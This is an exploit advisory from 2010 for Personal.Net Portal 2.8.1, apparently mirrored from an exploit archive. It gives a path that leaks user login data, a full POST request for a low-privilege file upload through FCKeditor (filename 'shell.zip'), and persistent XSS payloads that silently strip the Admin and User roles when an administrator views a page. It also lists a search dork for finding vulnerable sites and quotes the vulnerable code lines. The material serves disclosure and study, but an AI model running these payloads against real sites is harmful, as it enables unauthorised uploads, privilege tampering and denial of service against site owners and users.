Personal.Net Portal Multiple Vulnerabilities

2010-09-22T00:00:00
ID 1337DAY-ID-14139
Type zdt
Reporter Abysssec
Modified 2010-09-22T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            ============================================
Personal.Net Portal Multiple Vulnerabilities
============================================

  Title            :  Personal.Net Portal Multiple Vulnerabilities
  Affected Version :  Personal.Net Portal Version 2.8.1
  Discovery        :  www.Abysssec.com
  Vendor       :  http://www.dotnet-portal.net/Home.tab.aspx
  Download Links   :  http://sourceforge.net/projects/dotnetportal/
  Dork         :  "Personal .NET Portal"               
   
  
Description :
===========================================================================================     
  This version of Personal.Net Portal(2.8.1) have Multiple Valnerabilities :
        1- User's Information Revelation
        2- Upload a file with normal user that have low privilage
    3- Persistent XSS for DDOS and remove Roles and ... (XSRF)
 
 
User's Information Revelation:
===========================================================================================    
 
  With this path you can find User's Information of site:
 
    http://Example.com/Data/Statistics/Logins.xml
   
  this Information includes:     
        UserId
        LoginCount
        LastLogin
        LoginName  ( for Example Admin )
        FirstName
        LastName
 
 
 
Upload a file with normal user that have low privilage:
===========================================================================================    
   After you logged in as a normal user (for example userName:user and Password:user),
   in the following path you can upload a specific file
   with POST Method which is containing user's cookie.
 
   http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
    
   For example this POST request:
 
    POST http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1
    Host: Example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Proxy-Connection: keep-alive   
    Referer: http://Example.com/FCKeditor/editor/filemanager/browser/default/frmupload.html
    Cookie: ASP.NET_SessionId=wonb3e55eqgbrpnqdhcqly55; dotnetportal.auth=CE8C1A54B9676CDB4F911C820B4F59C50C75F6684E839578C59D289707A340E9EA444119E44E2B155612375255900C6FD3E0C94463E4C0ECEB929872CF2505FC
    Content-Type: multipart/form-data; boundary=---------------------------125671705429877
    Content-Length: 500    
 
 
    -----------------------------125671705429877
    Content-Disposition: form-data; name="NewFile"; filename="shell.zip"
    Content-Type: application/octet-stream
 
    ... any thing
    -----------------------------125671705429877--
    
 
   Here we have limitation of uploading specific file extension implementing by FckEditor v2
   that bypassing this barrier is on you.
 
   Uploaded files will be placing in this path:
 
        http://Example.com/Data/Resources/file/
         
    
   Vulnerable Code:
        The misconfiguration is in ...\FCKeditor\editor\filemanager\connectors\aspx\config.ascx 
        ln 42:
              private bool CheckAuthentication()
          {
            return Page.User.Identity.IsAuthenticated;
          }
 
 
Persistent XSS and XSRF:
===========================================================================================    
 
  In these Modules you can find Persistent XSS that data saves with no sanitization:
 
  1- Module name: CSVTable
     Field      : text
 
     Vulnerable Code:
     ...\Modules\CSVTable\editcsvtable.ascx
     ln 39:   sw.Write(txt.Text);
 
     For Example you can enter this script for DDOS:
       <script>__doPostBack('ctl071$Linkbutton21','')</script>
     ---------------------------------------------------------------------------------------   
 
  2- Module name: Feedback
     Fields     : From , Title , Message
 
     Vulnerable Code:
     ...\Modules\Feedback\feedback.ascx
     ln 55,56,57:   r["From"] = txtFrom.Text;
                r["Title"] = txtTitle.Text;
                r["Message"] = txtMessage.Text;
     ---------------------------------------------------------------------------------------   
 
  3- Module name: Html
     Field      : text
 
     Vulnerable Code:
     ...\Modules\Html\edithtml.ascx
     ln 39:   w.Write(txt.Text);
     ---------------------------------------------------------------------------------------   
 
  4- Module name: MyUser
     Fields     : First name , Sur name
 
     Vulnerable Code:
     ...\Modules\MyUser\MyUser.ascx.cs
     ln 55:    UserManagement.SaveUser(
               Page.User.Identity.Name,
               pwd, txtFirstName.Text, txtSurName.Text, txtEMail.Text,
               new System.Collections.ArrayList(principal.Roles), principal.Id);
 
 
     For Example you can enter this script for remove Admin Role:
        <script>__doPostBack('Content$ctl14$gridRoles$ctl02$ctl00','')</script> 
 
     or this for remove User Role:
        <script>__doPostBack('Content$ctl14$gridRoles$ctl03$ctl00','')</script>
    
     and when Admin see this page:
        http://Example.com/default.aspx?TabRef=adminusers
 
     the Role will be removed and program will be DDOS.
 
     ---------------------------------------------------------------------------------------   
 
   5- Module name: News
      Field      : text
 
     Vulnerable Code:
     ...\Modules\News\editnews.ascx
     ln 70:    dr["Text"] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[4].Controls[1]).Text;
     ---------------------------------------------------------------------------------------   
 
   6- Module name: Quotations
      Field      : text
 
     Vulnerable Code:
     ...\Modules\Quotations\editquotations.ascx
     ln 39:    sw.Write(txt.Text);   
     ---------------------------------------------------------------------------------------   
 
   7- Module name: Table
      Field      : column
 
     Vulnerable Code:
     ...\Modules\Table\edittable.ascx
     ln 65:     dr[i] = ((System.Web.UI.WebControls.TextBox)repAddRow.Items[i].FindControl("data")).Text;
     ln 137:    dr[i] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[i + 2].Controls[0]).Text;
     ---------------------------------------------------------------------------------------   
 
 
===========================================================================================



#  0day.today [2018-01-01]  #